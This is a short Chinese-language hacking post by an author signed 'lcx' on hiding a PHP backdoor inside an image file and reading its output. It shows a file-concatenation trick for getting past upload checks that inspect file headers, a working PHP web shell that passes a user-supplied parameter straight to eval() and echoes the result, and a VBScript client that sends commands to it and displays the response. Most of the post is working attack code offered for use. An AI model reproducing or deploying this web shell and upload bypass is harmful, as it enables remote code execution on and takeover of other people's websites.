php后门插在图片里执行回显思路
作者:lcx
有的网站不检查后缀格式,但检查文件头很严格,gif89a根本骗不过去,只能copy/b 1.gif+1.php 2.php这样.但一句话php木马或inulcde之类的就不会有回显了.而且把php代码插在图片里,如果不知那个网站目录有写权限的话,也很难写文件上去.
当然用NC抓包提交可以看到回显,但是太罗嗦了.下边的代码只能算个poc了.
php:
<html><body bgcolor="008888">
<font face='arial' size='3'>
COMMANDE PHP :
(pas de ";" ?la fin )
<form method="get" action="commande.php">
<?
$com=stripslashes($com);
echo"<input type=text size='100' name=com >";
?>
</form>
<?
echo "<font face='arial' size='3' color='lime'><b><i>$com</b></i></font> <br>";
$result=eval($com.";");
echo"<br><br> et <b>$result</b> " ;
?>
</body></html>
vbs:
url=URLEncoding(Wscript.Arguments(0))
Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url, False, False
oXMLHttpRequest.Send
'str=oXMLHttpRequest.responsebody
set aso=createobject("Adodb.Stream")
aso.open
aso.type=1
aso.write oXMLHttpRequest.responsebody
aso.saveToFile "c:\ok.htm",2
aso.close
Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.Run ("C:\Progra~1\Intern~1\IEXPLORE.EXE "&"c:\ok.htm")
Function URLEncoding(vstrIn)
strReturn = ""
Dim i
For i = 1 To Len(vstrIn)
ThisChr = Mid(vstrIn, i, 1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00) \ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
strReturn = Replace(strReturn, Chr(32), "%20")
URLEncoding = strReturn
End Function